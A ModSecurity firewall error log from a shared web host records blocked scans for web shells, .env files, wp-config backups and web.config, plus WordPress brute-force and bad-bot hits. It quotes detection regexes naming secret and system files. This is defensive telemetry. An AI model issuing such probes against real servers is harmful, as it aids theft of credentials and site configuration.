[Tue May 26 16:12:52.610025 2026] [security2:error] [pid 773493:tid 773693] [client 20.205.111.246:1308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/manager.php"] [unique_id "ahV5LJgy-Vk4jSdqTCRbBQAAAMs"]
[Tue May 26 16:12:52.705346 2026] [security2:error] [pid 773493:tid 773690] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5LJgy-Vk4jSdqTCRa-gAAAMg"]
[Tue May 26 16:12:52.827273 2026] [security2:error] [pid 773493:tid 773513] [remote 45.148.10.5:39782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/backend/.env"] [unique_id "ahV5LJgy-Vk4jSdqTCRbBgAA_xM"]
[Tue May 26 16:12:53.108643 2026] [security2:error] [pid 773493:tid 773533] [remote 45.148.10.5:39782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/api/.env"] [unique_id "ahV5LZgy-Vk4jSdqTCRbDgAAlCc"]
[Tue May 26 16:12:53.361616 2026] [security2:error] [pid 773493:tid 773711] [client 20.205.111.246:3501] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/media.php"] [unique_id "ahV5LZgy-Vk4jSdqTCRbGAAAAN0"]
[Tue May 26 16:12:53.519605 2026] [security2:error] [pid 773493:tid 773606] [remote 45.148.10.5:39782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ndequipments.com"] [uri "/config.php"] [unique_id "ahV5LZgy-Vk4jSdqTCRbGgAA0HA"]
[Tue May 26 16:12:53.866044 2026] [security2:error] [pid 773493:tid 773531] [remote 45.148.10.5:39782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ndequipments.com"] [uri "/settings.php"] [unique_id "ahV5LZgy-Vk4jSdqTCRbJAAAliU"]
[Tue May 26 16:12:54.096582 2026] [security2:error] [pid 773493:tid 773702] [client 20.205.111.246:4672] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/mar.php"] [unique_id "ahV5Lpgy-Vk4jSdqTCRbLAAAANQ"]
[Tue May 26 16:12:54.226248 2026] [security2:error] [pid 773493:tid 773527] [remote 45.148.10.5:39782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ndequipments.com"] [uri "/wp-config.php"] [unique_id "ahV5Lpgy-Vk4jSdqTCRbMAAA-SE"]
[Tue May 26 16:12:54.542710 2026] [security2:error] [pid 773493:tid 773584] [remote 45.148.10.5:39782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ndequipments.com"] [uri "/config.php.bak"] [unique_id "ahV5Lpgy-Vk4jSdqTCRbPAAA41o"]
[Tue May 26 16:12:54.649327 2026] [security2:error] [pid 773493:tid 773674] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5Lpgy-Vk4jSdqTCRbNQAAALg"]
[Tue May 26 16:12:54.658956 2026] [security2:error] [pid 773493:tid 773726] [client 106.219.85.83:23589] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5Lpgy-Vk4jSdqTCRbQwAAAOw"]
[Tue May 26 16:12:54.659190 2026] [security2:error] [pid 773493:tid 773726] [client 106.219.85.83:23589] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5Lpgy-Vk4jSdqTCRbQwAAAOw"]
[Tue May 26 16:12:54.833154 2026] [security2:error] [pid 773493:tid 773693] [client 20.205.111.246:1293] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/my1.php"] [unique_id "ahV5Lpgy-Vk4jSdqTCRbRQAAAMs"]
[Tue May 26 16:12:55.287133 2026] [security2:error] [pid 773493:tid 773534] [remote 45.148.10.5:39782] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "mail.ndequipments.com"] [uri "/wp-config.php.backup"] [unique_id "ahV5L5gy-Vk4jSdqTCRbTAAAqig"]
[Tue May 26 16:12:55.583871 2026] [security2:error] [pid 773493:tid 773738] [client 20.205.111.246:11016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/mm.php"] [unique_id "ahV5L5gy-Vk4jSdqTCRbVAAAAPg"]
[Tue May 26 16:12:55.624816 2026] [security2:error] [pid 773493:tid 773595] [remote 45.148.10.5:39782] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "mail.ndequipments.com"] [uri "/wp-config.php.bak"] [unique_id "ahV5L5gy-Vk4jSdqTCRbVQAArGU"]
[Tue May 26 16:12:55.966584 2026] [security2:error] [pid 773493:tid 773532] [remote 45.148.10.5:39782] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "mail.ndequipments.com"] [uri "/wp-config.php.old"] [unique_id "ahV5L5gy-Vk4jSdqTCRbWgAApiY"]
[Tue May 26 16:12:56.293802 2026] [security2:error] [pid 773493:tid 773658] [client 20.205.111.246:2179] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/network.php"] [unique_id "ahV5MJgy-Vk4jSdqTCRbYAAAAKg"]
[Tue May 26 16:12:56.304863 2026] [security2:error] [pid 773493:tid 773545] [remote 45.148.10.5:39782] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "mail.ndequipments.com"] [uri "/wp-config.php.save"] [unique_id "ahV5MJgy-Vk4jSdqTCRbYQAAtTM"]
[Tue May 26 16:12:56.679953 2026] [security2:error] [pid 773493:tid 773699] [client 103.44.52.196:53006] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5MJgy-Vk4jSdqTCRbYwAAANE"]
[Tue May 26 16:12:56.680127 2026] [security2:error] [pid 773493:tid 773699] [client 103.44.52.196:53006] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5MJgy-Vk4jSdqTCRbYwAAANE"]
[Tue May 26 16:12:56.851437 2026] [security2:error] [pid 773493:tid 773576] [remote 45.148.10.5:39782] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "mail.ndequipments.com"] [uri "/wp-config.php.swp"] [unique_id "ahV5MJgy-Vk4jSdqTCRbbgAAkVI"]
[Tue May 26 16:12:57.035075 2026] [security2:error] [pid 773493:tid 773628] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5MJgy-Vk4jSdqTCRbaAAAAIo"]
[Tue May 26 16:12:57.036344 2026] [security2:error] [pid 773493:tid 773668] [client 20.205.111.246:3949] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/new.php"] [unique_id "ahV5MZgy-Vk4jSdqTCRbcgAAALI"]
[Tue May 26 16:12:57.086821 2026] [security2:error] [pid 773493:tid 773509] [remote 45.148.10.5:39782] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "mail.ndequipments.com"] [uri "/wp-config.php.txt"] [unique_id "ahV5MZgy-Vk4jSdqTCRbdAABAA8"]
[Tue May 26 16:12:57.413058 2026] [security2:error] [pid 773493:tid 773676] [client 45.148.10.5:39782] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5MZgy-Vk4jSdqTCRbfwAAulc"]
[Tue May 26 16:12:57.779491 2026] [security2:error] [pid 773493:tid 773685] [client 45.148.10.5:39782] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5MZgy-Vk4jSdqTCRbiQAAw3M"]
[Tue May 26 16:12:57.793721 2026] [security2:error] [pid 773493:tid 773688] [client 20.205.111.246:1169] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/0x.php"] [unique_id "ahV5MZgy-Vk4jSdqTCRbigAAAMY"]
[Tue May 26 16:12:58.767168 2026] [http2:info] [pid 782634:tid 782634] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 16:12:59.001657 2026] [security2:error] [pid 782634:tid 782774] [client 20.205.111.246:4139] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/0.php"] [unique_id "ahV5M__P9qBfeb1w76Y5cAAAAAo"]
[Tue May 26 16:12:59.086087 2026] [security2:error] [pid 782634:tid 782776] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5M__P9qBfeb1w76Y5cwAADHc"]
[Tue May 26 16:12:59.342030 2026] [security2:error] [pid 782634:tid 782804] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5Mv_P9qBfeb1w76Y5bQAAACg"]
[Tue May 26 16:12:59.666364 2026] [security2:error] [pid 782634:tid 782844] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5M__P9qBfeb1w76Y5iwAAUAg"]
[Tue May 26 16:12:59.669232 2026] [security2:error] [pid 782634:tid 782825] [client 20.205.111.246:1162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/oxshell.php"] [unique_id "ahV5M__P9qBfeb1w76Y5lAAAAD0"]
[Tue May 26 16:12:59.862443 2026] [security2:error] [pid 782634:tid 782858] [client 35.175.92.196:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahV5M__P9qBfeb1w76Y5mgAAAF4"]
[Tue May 26 16:12:59.862901 2026] [security2:error] [pid 782634:tid 782856] [client 35.175.92.196:16336] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahV5M__P9qBfeb1w76Y5mAAAAFw"]
[Tue May 26 16:13:00.004418 2026] [security2:error] [pid 782634:tid 782870] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5M__P9qBfeb1w76Y5ngAAag4"]
[Tue May 26 16:13:00.068213 2026] [security2:error] [pid 782634:tid 782876] [client 35.175.92.196:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahV5NP_P9qBfeb1w76Y5pAAAAHA"]
[Tue May 26 16:13:00.068891 2026] [security2:error] [pid 782634:tid 782871] [client 35.175.92.196:17042] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahV5NP_P9qBfeb1w76Y5ogAAAGs"]
[Tue May 26 16:13:00.360872 2026] [security2:error] [pid 782634:tid 782886] [client 35.175.92.196:17058] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahV5NP_P9qBfeb1w76Y5pgAAAHo"]
[Tue May 26 16:13:00.402393 2026] [security2:error] [pid 782634:tid 782882] [client 20.205.111.246:3515] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/php8.php"] [unique_id "ahV5NP_P9qBfeb1w76Y5rAAAAHY"]
[Tue May 26 16:13:00.408761 2026] [security2:error] [pid 782634:tid 782794] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5NP_P9qBfeb1w76Y5qAAAHhA"]
[Tue May 26 16:13:00.817844 2026] [security2:error] [pid 782634:tid 782817] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5NP_P9qBfeb1w76Y5yQAANSU"]
[Tue May 26 16:13:00.995272 2026] [security2:error] [pid 782634:tid 782799] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5NP_P9qBfeb1w76Y5sQAAACM"]
[Tue May 26 16:13:01.081653 2026] [security2:error] [pid 782634:tid 782775] [client 20.205.111.246:9180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/p.php"] [unique_id "ahV5Nf_P9qBfeb1w76Y51AAAAAs"]
[Tue May 26 16:13:01.168731 2026] [security2:error] [pid 782634:tid 782789] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5Nf_P9qBfeb1w76Y51gAAGTM"]
[Tue May 26 16:13:01.497111 2026] [security2:error] [pid 782634:tid 782841] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5Nf_P9qBfeb1w76Y53AAATSs"]
[Tue May 26 16:13:01.814279 2026] [security2:error] [pid 782634:tid 782830] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5Nf_P9qBfeb1w76Y55gAAQi4"]
[Tue May 26 16:13:01.824608 2026] [security2:error] [pid 782634:tid 782844] [client 20.205.111.246:1205] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/php.php"] [unique_id "ahV5Nf_P9qBfeb1w76Y55wAAAFA"]
[Tue May 26 16:13:02.116730 2026] [security2:error] [pid 782634:tid 782879] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5Nv_P9qBfeb1w76Y58gAAczE"]
[Tue May 26 16:13:02.394034 2026] [security2:error] [pid 782634:tid 782865] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5Nf_P9qBfeb1w76Y56gAAAGU"]
[Tue May 26 16:13:02.506747 2026] [security2:error] [pid 782634:tid 782855] [client 20.205.111.246:3479] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/past.php"] [unique_id "ahV5Nv_P9qBfeb1w76Y59AAAAFs"]
[Tue May 26 16:13:02.575042 2026] [security2:error] [pid 782634:tid 782890] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5Nv_P9qBfeb1w76Y59QAAfjY"]
[Tue May 26 16:13:02.911762 2026] [security2:error] [pid 782634:tid 782776] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5Nv_P9qBfeb1w76Y5_gAADDQ"]
[Tue May 26 16:13:03.208882 2026] [security2:error] [pid 782634:tid 782807] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5N__P9qBfeb1w76Y6BQAAKzk"]
[Tue May 26 16:13:03.219540 2026] [security2:error] [pid 782634:tid 782802] [client 20.205.111.246:3954] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/root.php"] [unique_id "ahV5N__P9qBfeb1w76Y6BgAAACY"]
[Tue May 26 16:13:03.576944 2026] [security2:error] [pid 782634:tid 782690] [remote 45.148.10.5:12882] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/web.config"] [unique_id "ahV5N__P9qBfeb1w76Y6CwAADTc"]
[Tue May 26 16:13:03.881461 2026] [security2:error] [pid 782634:tid 782797] [client 20.205.111.246:12682] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/r.php"] [unique_id "ahV5N__P9qBfeb1w76Y6EAAAACE"]
[Tue May 26 16:13:03.938152 2026] [security2:error] [pid 782634:tid 782842] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5N__P9qBfeb1w76Y6EQAATkE"]
[Tue May 26 16:13:04.030316 2026] [security2:error] [pid 782634:tid 782695] [remote 5.78.119.122:33824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahV5N__P9qBfeb1w76Y6DwAAOzw"]
[Tue May 26 16:13:04.288936 2026] [security2:error] [pid 782634:tid 782790] [client 66.249.64.44:55400] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5N__P9qBfeb1w76Y6BwAAABo"], referer: https://mosykay.com/prizes/128878046
